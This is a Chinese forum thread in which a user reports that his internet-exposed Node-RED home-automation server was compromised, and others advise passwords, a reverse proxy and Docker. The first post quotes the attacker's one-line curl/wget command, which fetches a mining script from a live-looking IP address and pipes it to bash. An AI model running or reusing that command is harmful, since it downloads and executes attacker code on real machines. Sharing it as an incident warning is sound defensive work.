使用node-red请注意安全问题

joylin1988 · 发表于 2025-2-12 18:28:33

今天接到老婆电话，家里自动化不能用了，回家后发现node-red被黑了，所有流程被删除，还添加了一个流程，下载挖矿脚本的
( curl http://123.58.224.8:10776/authenticationendpoint//apache_config -sk -o - || wget --no-check-certificate http://123.58.224.8:10776/authenticationendpoint//apache_config -O -) | bash
奉劝大家，最好内网使用，或者换一个端口使用，
好在我使用的pve安装的系统，有几天的备份，要不然就头大了

jjcs · 发表于 2025-2-12 19:11:27

你是不是没有设置密码，直接web映射出去，如果是这样，只能说活该

jjcs · 发表于 2025-2-12 19:13:24

而且你nodered是不是使用npm宿主机直接安装的？

ad596142041 · 发表于 2025-2-12 20:11:46

一直用的反向代理，还是很安全。

jjcs · 发表于 2025-2-12 20:17:16

ad596142041 发表于 2025-2-12 20:11
一直用的反向代理，还是很安全。

正解，用反向代理

joylin1988 · 发表于 2025-2-12 22:58:30

jjcs 发表于 2025-2-12 19:13
而且你nodered是不是使用npm宿主机直接安装的？

一直这么用的，一年了没有出现问题，以后要注意了

binghun9806 · 发表于 2025-2-13 08:05:24

年前我也遇到了，一模一样的情况

xyz5378 · 发表于 2025-2-13 09:32:15

你这是我家大门躺大开了啊

jjcs · 发表于 2025-2-13 12:42:33

joylin1988 发表于 2025-2-12 22:58
一直这么用的，一年了没有出现问题，以后要注意了

npm安装，nodered直接可以执行宿主机命令，还是用docker把

		自动登录	找回密码
密码			立即注册

[流程系列] 使用node-red请注意安全问题